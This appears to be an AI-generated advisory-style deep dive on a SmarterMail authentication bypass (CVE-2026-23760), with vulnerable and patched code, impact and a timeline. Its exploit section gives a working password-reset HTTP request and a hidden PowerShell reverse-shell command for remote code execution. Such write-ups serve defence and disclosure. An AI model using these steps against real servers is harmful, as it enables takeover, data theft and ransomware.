CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.


CVE-2026-23760

SmarterMail, Dumber Auth: The CVE-2026-23760 Deep Dive

Alon Barad, Software Engineer

Jan 28, 2026 · 5 min read · 38 visits

Executive Summary (TL;DR)

If you run SmarterMail (versions < Build 9511), anyone can become your system administrator by sending a single JSON packet. Once they are admin, they can execute OS commands via the 'Volume Mounts' feature. It's a 9.8/10 on the panic scale.

A critical authentication bypass in SmarterTools SmarterMail allows unauthenticated attackers to reset the administrator password by simply telling the API they are an administrator. This leads to immediate remote code execution via built-in management features.

The Target: An Exchange Alternative

SmarterMail by SmarterTools is one of those ubiquitous pieces of software that quietly powers the internet's underbelly. It's an Exchange alternative for Windows and Linux, popular among MSPs and mid-sized businesses who look at Microsoft's licensing fees and say, "No thanks."

Because it handles email, it sits on the perimeter, usually exposing ports 80, 443, and its management interface (default 9998) to the entire world. It holds the keys to the kingdom: password resets, confidential communications, and 2FA tokens.

In January 2026, researchers found that this digital fortress had left the back door not just unlocked, but wide open with a neon sign pointing to it. CVE-2026-23760 isn't a complex memory corruption bug; it's a logic flaw so fundamental it hurts.

The Flaw: Trusting the Client

The vulnerability resides in the force-reset-password API endpoint. Ideally, a password reset function should require one of two things: the old password (to prove you are who you say you are) or a secure token (to prove you have access to the recovery email).

SmarterMail implemented these checks for normal users. However, for system administrators, the developers took a shortcut. The API accepts a JSON payload containing a boolean flag called IsSysAdmin.

Here is the logic flaw in plain English: If the request says IsSysAdmin: true, the code assumes the caller is authorized to perform the reset. It skips the "Old Password" check entirely. It's the digital equivalent of walking into a bank vault while wearing a t-shirt that says "I work here," and the security guards just waving you through.

The Code: The Smoking Gun

Let's look at the decompiled C# code from the AuthenticationController. This is where the magic happens—or rather, where the tragedy unfolds.

The Vulnerable Code (Pre-Build 9511):

public new ResetPasswordResult ForcePasswordReset(ForceResetPasswordInputs inputs, string hostname)
{
    // ... setup code ...
 
    // CRITICAL FLAW: Trusting user input blindly
    if (inputs.IsSysAdmin)
    {
        // Retrieve the admin account by username (provided by attacker)
        var admin = SystemRepository.Instance.AdministratorGetByUsername(inputs.Username);
        
        // Create an update object with the NEW password (provided by attacker)
        var item = new db_system_administrator
        {
            guid = admin.guid,
            Password = inputs.NewPassword,
            password_history_hashed = dictionary
        };
 
        // Commit to database without verifying OldPassword or Token!
        SystemRepository.Instance.AdministratorUpdate(item, ...);
    }
    // ...
}

See that empty space before AdministratorUpdate? That's where the security check should be. The code implicitly trusts that if you claim to be doing a SysAdmin reset, you must know what you're doing.

The Fix (Build 9511):

The patch is a single if statement that validates the OldPassword even for admins.

if (inputs.IsSysAdmin)
{
    // THE FIX: Validate the existing credentials first
    if (!db_system_administrator_readonly.ValidatePassword(inputs.OldPassword, null)) 
    {
        return new ResetPasswordResult 
        {
            Success = false, 
            Message = "Invalid input parameters"
        };
    }
    // ... proceed to update ...
}
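To make the logic flaw concrete, here is an added Python model of the reset handler; it is not SmarterMail's code, and AdminStore and Session are stand-ins assumed for the model. The vulnerable path honours the client's IsSysAdmin flag exactly as described above, while the hardened path goes one step further than the Build 9511 patch: it ignores the JSON flag entirely, takes the caller's role from the server-side session, and only then verifies OldPassword against the stored hash.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass

def hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2-SHA256; the iteration count is illustrative, not SmarterMail's
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

class AdminStore:
    """Hypothetical stand-in for SystemRepository / db_system_administrator."""
    def __init__(self, username: str, password: str):
        self.username = username
        self.salt = os.urandom(16)
        self.digest = hash_password(password, self.salt)

    def validate_password(self, candidate: str) -> bool:
        # Constant-time comparison so the check itself does not leak timing
        return hmac.compare_digest(hash_password(candidate, self.salt), self.digest)

    def update_password(self, new_password: str) -> None:
        self.salt = os.urandom(16)
        self.digest = hash_password(new_password, self.salt)

@dataclass
class Session:
    """Server-side session: is_sysadmin is set at login, never from the request body."""
    username: str
    is_sysadmin: bool

def force_reset_vulnerable(inputs: dict, store: AdminStore) -> bool:
    # Pre-Build 9511 logic: the client claims IsSysAdmin, so OldPassword is never checked
    if str(inputs.get("IsSysAdmin")).lower() == "true" and inputs.get("Username") == store.username:
        store.update_password(inputs["NewPassword"])
        return True
    return False

def force_reset_fixed(inputs: dict, session: Session, store: AdminStore) -> bool:
    # Authorisation comes from the authenticated session, not from the JSON flag
    if not session.is_sysadmin or session.username != store.username:
        return False
    if inputs.get("NewPassword") != inputs.get("ConfirmPassword"):
        return False
    # Build 9511 check: prove the existing credential before any update is committed
    if not store.validate_password(inputs.get("OldPassword", "")):
        return False
    store.update_password(inputs["NewPassword"])
    return True
```

Feeding the same payload from the exploit section into both functions shows the difference: the vulnerable model rotates the admin password on a garbage OldPassword, the hardened model refuses until the real one is supplied by an already-authenticated admin.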

The Exploit: From Zero to SYSTEM

Exploiting this is trivially easy. You don't need shellcode, you don't need heap spraying. You just need curl.

Step 1: The Takeover

Send a POST request to the API. We set IsSysAdmin to true and provide the default administrator username (admin). We can put garbage in OldPassword because the server ignores it.

POST /api/v1/auth/force-reset-password HTTP/1.1
Host: target-mail-server:9998
Content-Type: application/json
 
{
  "IsSysAdmin": "true",
  "OldPassword": "ignored_garbage",
  "Username": "admin",
  "NewPassword": "Hacked!123",
  "ConfirmPassword": "Hacked!123"
}

If successful, the server responds with 200 OK and a debug string containing check8.2. Congratulations, you are now the admin.

Step 2: The Execution (RCE)

SmarterMail has a feature called "Volume Mounts" that allows admins to map drives. Historically, mail server admins often need to execute scripts. SmarterMail allows this via the interface.

An attacker simply logs in with the new password, navigates to Settings -> Volume Mounts, and configures a new mount point. In the command field, they inject an OS command:

cmd.exe /c powershell -nop -w hidden -e <base64_reverse_shell>

Upon saving, the service executes this command as NT AUTHORITY\SYSTEM on Windows or root on Linux. Game over.

The Impact

The impact here cannot be overstated. We are talking about unauthenticated Remote Code Execution (RCE) on an email server.

  1. Data Exfiltration: The attacker can read every email sent or received by the organization. Corporate espionage gold.
  2. Pivot Point: Mail servers are often trusted by other internal systems. This is the perfect beachhead for lateral movement into the domain controller.
  3. Ransomware: It is already confirmed that ransomware groups are using this CVE to encrypt mail stores.

CISA added this to their KEV catalog just days after the exploit went public. If you see this open on the internet, it is likely already compromised.

Official Patches

SmarterTools: SmarterMail Release Notes, Build 9511

Technical Appendix

CVSS Score: 9.8 / 10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS Probability: 51.37% (top 2% most exploited)
2,300 (via Shodan)

Affected Systems

  • SmarterMail Enterprise (Windows)
  • SmarterMail Professional (Windows)
  • SmarterMail Free (Windows)

Affected Versions Detail

Product: SmarterMail (SmarterTools)
Affected Versions: < Build 9511
Fixed Version: Build 9511

CWE: CWE-288 (Auth Bypass)
CVSS v3.1: 9.8 (Critical)
Attack Vector: Network (API)
Privileges Required: None
User Interaction: None
Exploit Status: High (Active Exploitation)
EPSS Score: 0.51 (97th Percentile)

MITRE ATT&CK Mapping

  • T1190 Exploit Public-Facing Application (Initial Access)
  • T1078 Valid Accounts (Persistence)
  • T1059 Command and Scripting Interpreter (Execution)

CWE-288: Authentication Bypass Using an Alternate Path or Channel

Known Exploits & Detection

  • watchTowr: full exploit chain for auth bypass and RCE
  • Nuclei: detection template available

Vulnerability Timeline

2026-01-08: Vulnerability discovered by watchTowr
2026-01-15: SmarterTools releases Build 9511 patch
2026-01-17: Active exploitation detected in the wild
2026-01-22: Public disclosure and PoC release
2026-01-26: Added to CISA KEV Catalog


